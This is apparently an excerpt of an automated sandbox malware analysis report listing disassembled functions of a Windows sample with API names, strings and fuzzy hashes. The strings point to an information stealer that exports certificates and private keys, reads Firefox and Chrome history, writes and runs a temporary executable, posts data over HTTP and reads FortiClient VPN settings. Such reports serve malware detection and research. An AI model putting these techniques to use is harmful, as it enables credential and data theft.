                                                                                            • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6DFE236DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                            • String ID: ,-1{$4(G$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$jlzm
                                                                                            • API String ID: 2161712720-3700434115
                                                                                            • Opcode ID: d750664ffbedd7f6a105bf9f1e719808195276d3ff6d54a1a0eed4277e7a8463
                                                                                            • Instruction ID: 964724ae8b1a0b710b5bdb3a220976e3d1cb5a9625fde0e4dd492376ea6370ca
                                                                                            • Opcode Fuzzy Hash: d750664ffbedd7f6a105bf9f1e719808195276d3ff6d54a1a0eed4277e7a8463
                                                                                            • Instruction Fuzzy Hash: 7BE15E32B14642AAE720CFA1E8547ED77A1BB89788F40413ADE4D97B58DF3CD159CB40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                            • String ID: =r:r$>r!r$>r!r
                                                                                            • API String ID: 199669925-1865137870
                                                                                            • Opcode ID: fe1e3c4305144440e10683195b4bbefb58b3cf12c5ee85f86fe1a2b260d32e69
                                                                                            • Instruction ID: fbfce1d44526ccd2929d75d682047d67356196045bd0ba4c43a498a5db4adbf8
                                                                                            • Opcode Fuzzy Hash: fe1e3c4305144440e10683195b4bbefb58b3cf12c5ee85f86fe1a2b260d32e69
                                                                                            • Instruction Fuzzy Hash: D8A19172E18782A6EB20DF66A4441AD77A1FBC9B84F54403AEE4D83B59DF3DD415CB00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                            • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                            • API String ID: 4154822446-3438982840
                                                                                            • Opcode ID: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
                                                                                            • Instruction ID: e051668cf6f95fa7201f7479a2cd0268ef976d8bec09956d286ed6e5a9893052
                                                                                            • Opcode Fuzzy Hash: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
                                                                                            • Instruction Fuzzy Hash: 25315E22B18A87F1EB20DF24E8445EDA361FBC4795F804133DA5E875A8EF6DD619C740
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                            • String ID: "_": ""$%02X
                                                                                            • API String ID: 2879528921-1880646522
                                                                                            • Opcode ID: 724603355995c16272e635407a9e37135ba2e644d7c58ba3da48bbd20d5b832f
                                                                                            • Instruction ID: 05162c2bb3ef95029d7a1c378be725177c9b7afa15ba86eb4a0b27e5739bb570
                                                                                            • Opcode Fuzzy Hash: 724603355995c16272e635407a9e37135ba2e644d7c58ba3da48bbd20d5b832f
                                                                                            • Instruction Fuzzy Hash: 4FD14362F0960378EA24EB26A8511FD13A5AFC57C4B446037ED1FD76A6FE3EE5258300
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                            • String ID:
                                                                                            • API String ID: 4035193891-0
                                                                                            • Opcode ID: fc502c4183f38da3a6c738e70bd59c56bb6cf1e44f81229a9ff746ea35346d61
                                                                                            • Instruction ID: 357a824b62cd079139042ba2bc5f9063867afdadea94171c1e2e8060d17097a1
                                                                                            • Opcode Fuzzy Hash: fc502c4183f38da3a6c738e70bd59c56bb6cf1e44f81229a9ff746ea35346d61
                                                                                            • Instruction Fuzzy Hash: EA218462D1C7D3A7EB104F61A4052BEA790FBC9781F44523ADACD82B55EF6DC1648B40
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptExport$HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 532797600-0
                                                                                            • Opcode ID: 831287bed50c6b68a2a3c77c2f92f5c7b860a71e9000b44808c3b900f1a82504
                                                                                            • Instruction ID: d1607776534e7216a0bab23481a2b6dfd3bd046710e4bba0b15abf652f2409f9
                                                                                            • Opcode Fuzzy Hash: 831287bed50c6b68a2a3c77c2f92f5c7b860a71e9000b44808c3b900f1a82504
                                                                                            • Instruction Fuzzy Hash: A8219132A19643A6EB60CF15F50036E73E1EBC4B94F008231EA4D877A5EF3DD5518B00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b16f4b17d73021f3b2e32145709c8bd66a9f2c3de1f9d79f3a69f6df6bdbbb5c
                                                                                            • Instruction ID: 8f20edaf05d6f67177e577ea9958f7168fbb504ca32cad31526f19b1f42b997e
                                                                                            • Opcode Fuzzy Hash: b16f4b17d73021f3b2e32145709c8bd66a9f2c3de1f9d79f3a69f6df6bdbbb5c
                                                                                            • Instruction Fuzzy Hash: 25615C53A092D62AF7258E3A45512FE2B91EB56F88F040175DE898BB87EE2DD457C300
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 404f8656230e13f4b390a5daf55f47e5d3011ab1fd20da05371be4dacabc9fd8
                                                                                            • Instruction ID: 14dd5dade8fc8267e798c368dfbd5c3a164f6a6f4c267ac2f1ce85d17da1df1d
                                                                                            • Opcode Fuzzy Hash: 404f8656230e13f4b390a5daf55f47e5d3011ab1fd20da05371be4dacabc9fd8
                                                                                            • Instruction Fuzzy Hash: 38516847A043C26DEB268E3A84923EC2F51EB25B98F454036DF999BB47E93DD10BC310
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 2161876737-0
                                                                                            • Opcode ID: ce4658d3263bb0bad04798cbd4f1d375ce92f8820936d7a88265a75bc09cd35d
                                                                                            • Instruction ID: 45be3f136e5fe061620479b526f0cc92ffdff3eabb3e99b649b4ba93acd57319
                                                                                            • Opcode Fuzzy Hash: ce4658d3263bb0bad04798cbd4f1d375ce92f8820936d7a88265a75bc09cd35d
                                                                                            • Instruction Fuzzy Hash: 8A319521A08A42A2E724DB26A85C77D63D1BBC9BE1F444236DE5DC77B4DF3CD4558B00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                            • String ID: %08X.exe$open
                                                                                            • API String ID: 2307396689-1771423410
                                                                                            • Opcode ID: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
                                                                                            • Instruction ID: c0ba955eb961fd93b39abee1a557fac7a7475307995e4579c20523733607986b
                                                                                            • Opcode Fuzzy Hash: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
                                                                                            • Instruction Fuzzy Hash: 5A317572A18A86B6E7308F61E8887ED6361FBC9789F404136DA4D86958DF7CC65DC700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                            • String ID: Default$LOCALAPPDATA$\History
                                                                                            • API String ID: 3980575106-3555721359
                                                                                            • Opcode ID: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
                                                                                            • Instruction ID: 78610f7056e2db72e8a69055584e56a5b3543ef23e53b943018616d7b2acf7db
                                                                                            • Opcode Fuzzy Hash: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
                                                                                            • Instruction Fuzzy Hash: 94515322E18FC692E750DF24D9452AC7370F7D8784F45A222DA8D93666EF79E6D8C300
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                                            • String ID: http
                                                                                            • API String ID: 948891078-2541227442
                                                                                            • Opcode ID: 4c8b6a515aa789ec0d19bb8bf84febe21972d20bffd274fdd8ef13372bcd39a7
                                                                                            • Instruction ID: 7772587fe3116c1bbfc7a6f47c11c647b6218dbe891156532126ae1b799ff0a2
                                                                                            • Opcode Fuzzy Hash: 4c8b6a515aa789ec0d19bb8bf84febe21972d20bffd274fdd8ef13372bcd39a7
                                                                                            • Instruction Fuzzy Hash: CF414F32B08A86E5E7209F65E4543ED63A1FBC4B89F044137DA4ECAA68DF3DD564C740
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                            • String ID: exit
                                                                                            • API String ID: 1626563136-1626635026
                                                                                            • Opcode ID: ff8a8709f52c0e2c2161a494e7b9dca54c99b42b1022dffa2c81801740ef66ac
                                                                                            • Instruction ID: c48441c126827c1cc33d2206f2d1e2a175f3f5e546506384b5f2a2154bd05c1e
                                                                                            • Opcode Fuzzy Hash: ff8a8709f52c0e2c2161a494e7b9dca54c99b42b1022dffa2c81801740ef66ac
                                                                                            • Instruction Fuzzy Hash: 6B316F21A09643A1EB60DF35D4942BD23A1FFC4B88F542033E90EC75A9EF2DD865D350
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1750269033-0
                                                                                            • Opcode ID: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
                                                                                            • Instruction ID: 67812bd1e344177493591b555ecb94f8c245b87f5910f7c56f9d1fdb4ef868c7
                                                                                            • Opcode Fuzzy Hash: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
                                                                                            • Instruction Fuzzy Hash: 54611B26B08A06A5EB109F65D4543AD23A1FB88B89F448136DE0DD7B68EF3ED619C350
                                                                                            APIs
                                                                                              • Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5
                                                                                            • __memcpy.DELAYIMP ref: 00007FF6DFE2F1A3
                                                                                              • Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30159
                                                                                              • Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30167
                                                                                              • Part of subcall function 00007FF6DFE2EBA8: lstrlenA.KERNEL32 ref: 00007FF6DFE2EBC5
                                                                                              • Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
                                                                                              • Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                            • String ID: last_visit_time$table$url$urls
                                                                                            • API String ID: 2336645791-3896411411
                                                                                            • Opcode ID: 744dd99e044302d5fe6d407e5c776aa4f2f8f712bbe73ab7b054d3950afb3704
                                                                                            • Instruction ID: fca62be55d55b1ae2c49186e959ba5f790bb6a9f75c72cbcbcd9d8b59a356807
                                                                                            • Opcode Fuzzy Hash: 744dd99e044302d5fe6d407e5c776aa4f2f8f712bbe73ab7b054d3950afb3704
                                                                                            • Instruction Fuzzy Hash: B5316262B086C3A1EE709B26E8405BEA350BBC5BD0F404133DE8E877A5EE7DE565C700
                                                                                            APIs
                                                                                              • Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5
                                                                                            • __memcpy.DELAYIMP ref: 00007FF6DFE2EF77
                                                                                              • Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30159
                                                                                              • Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30167
                                                                                              • Part of subcall function 00007FF6DFE2EBA8: lstrlenA.KERNEL32 ref: 00007FF6DFE2EBC5
                                                                                              • Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
                                                                                              • Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                            • String ID: last_visit_date$moz_places$table$url
                                                                                            • API String ID: 2336645791-66087218
                                                                                            • Opcode ID: c83cf086847f79ee1b897310ee07e54d52266562039ffac1bc092bc0328fa8d9
                                                                                            • Instruction ID: 579a18d29d8533dd25ec428700646ea8f20681c00f7940baf21cdcd9bafbf7c7
                                                                                            • Opcode Fuzzy Hash: c83cf086847f79ee1b897310ee07e54d52266562039ffac1bc092bc0328fa8d9
                                                                                            • Instruction Fuzzy Hash: A63144627086C3A1EE709B26E8405AE6351BBC47D4F448033DE4EC7795EE7ED965C700
                                                                                            APIs
                                                                                              • Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5
                                                                                            • __memcpy.DELAYIMP ref: 00007FF6DFE2ED57
                                                                                              • Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30159
                                                                                              • Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30167
                                                                                              • Part of subcall function 00007FF6DFE2EBA8: lstrlenA.KERNEL32 ref: 00007FF6DFE2EBC5
                                                                                              • Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
                                                                                              • Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                            • String ID: last_visit_time$table$url$urls
                                                                                            • API String ID: 2336645791-3896411411
                                                                                            • Opcode ID: f46eba84160fcf9a921103440b15831abed8088731bca9a3dad6bc0032e989e1
                                                                                            • Instruction ID: ce7dd3363f503d32b814050326334171222938ab1628488e84766a65863ef12f
                                                                                            • Opcode Fuzzy Hash: f46eba84160fcf9a921103440b15831abed8088731bca9a3dad6bc0032e989e1
                                                                                            • Instruction Fuzzy Hash: 01316F62608693A1EA709F26E8501AE6360BBC4BD0F448033DE8EC7795FE7DE965C700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: AppendPathlstrcpy
                                                                                            • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                            • API String ID: 3043196718-4231764533
                                                                                            • Opcode ID: 8ac59f02cab71109790e32571a4a62e77d6df544d34a991c1123c13a25c48b9f
